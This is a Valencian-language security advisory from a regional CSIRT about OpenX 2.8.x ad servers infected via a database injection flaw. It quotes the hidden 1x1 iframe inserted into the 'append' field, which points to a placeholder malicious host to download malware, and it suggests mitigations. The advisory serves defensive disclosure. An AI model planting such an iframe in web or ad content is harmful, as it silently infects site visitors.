Centre de Seguretat TIC de la Comunitat Valenciana
Inici » Alertes » Codi maliciós a través d'OpenX
[   Castellano   |   Valencià   ]  

listado en truested introducer

Cercar


  • WWW csirtcv.es

ÚLTIMES ALERTES

RSS FEED

Més...

Autoritat de Certificació de la Comunitat Valenciana
Plan Avanza
Logo Avantic
Bandera de europa Feder
Sombra del menu
Sombra del menu
Anterior
Subscripció a les alertes del CSIRTCV   Subscripció als butlletins del CSIRTCV   Accés al Forùm   Accés a cursos de formació   RSS   Versió per a imprimir
  Següent

Codi maliciós a través d'OpenX

13-09-2010

Fa uns dies, en visitar alguns dels blocs de Mitjans i Xarxes (incloent-hi OpenSecurity), diversos navegadors d'Internet mostraven una advertència sobre que el lloc web en qüestió allotjava programari maliciós.

Sistemes afectats:

OpenX 2.8.x

Risc:   Mig

Descripció:

Aquest problema ja va ser solucionat, i tal com es va explicar en el blog corporatiu, es va deure al fet que OpenX, la plataforma amb què es gestionen campanyes de publicitat de la xarxa, va ser infectada amb un codi maliciós.

Hi ha una vulnerabilitat en algunes versions d'OpenX 2.8.X, que possibilita injectar codi en la base de dades de les campanyes publicitàries. En aquest cas, es va detectar que en el camp “append” va ser inserit el següent iframe:

“<iframe src="http://sitio-web-malicioso/tds/in.cgi?default" width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no"></iframe>”

Aquest codi se serveix juntament amb els anuncis d'OpenX, i té la finalitat de descarregar codi maliciós  en l'equip de l'usuari.

Solució:

El més recomanable és actualitzar a l'última versió d'OpenX, la qual, segons sembla, tanca la vulnerabilitat, però si per qualsevol motiu no els és possible, poden recórrer a aquestes dues solucions:

  1. Verifiqueu constantment que el camp “append” no tinga codi maliciós. No és molt efectiu si es fa de forma manual, però es pot crear un script en cronjob que verifique cada un cert temps el dit camp i que ens alerte en el cas que trobe codi maliciós, d'aquesta manera podrem eliminar-lo al més prompte possible de la base de dades.
  2. En el cas que no s'utilitze, inhabiliteu el camp “append”. Per a açò únicament hem d'editar l'arxiu “/www/delivery/ajs.php” de la nostra instal·lació d'OpenX i en la línia 3227 reemplaçar el fragment de codi “!empty($aBanner['append']) ? $aBanner['append'] : ”” per “$append=”";“.
Açò no corregeix la vulnerabilitat, però almenys evita que es continue servint el codi maliciós a través dels anuncis de publicitat. En els fòrums d'OpenX es pot veure que molts usuaris s'han vist afectats per aquest problema, així que si useu aquesta eina  els recomanem que prengueu les vostres precaucions.

Més informació:

http://www.opensecurity.es/malware-a-traves-de-openx-y-dos-soluciones-para-evitarlo/#more-4132

Font:   Open Security http://www.opensecurity.es/

Valid XHTML 1.0 Transitional Valid CSS Icono de conformidad con el Nivel Doble-A, de las Directrices de Accesibilidad para el Contenido Web 1.0 del W3C-WAI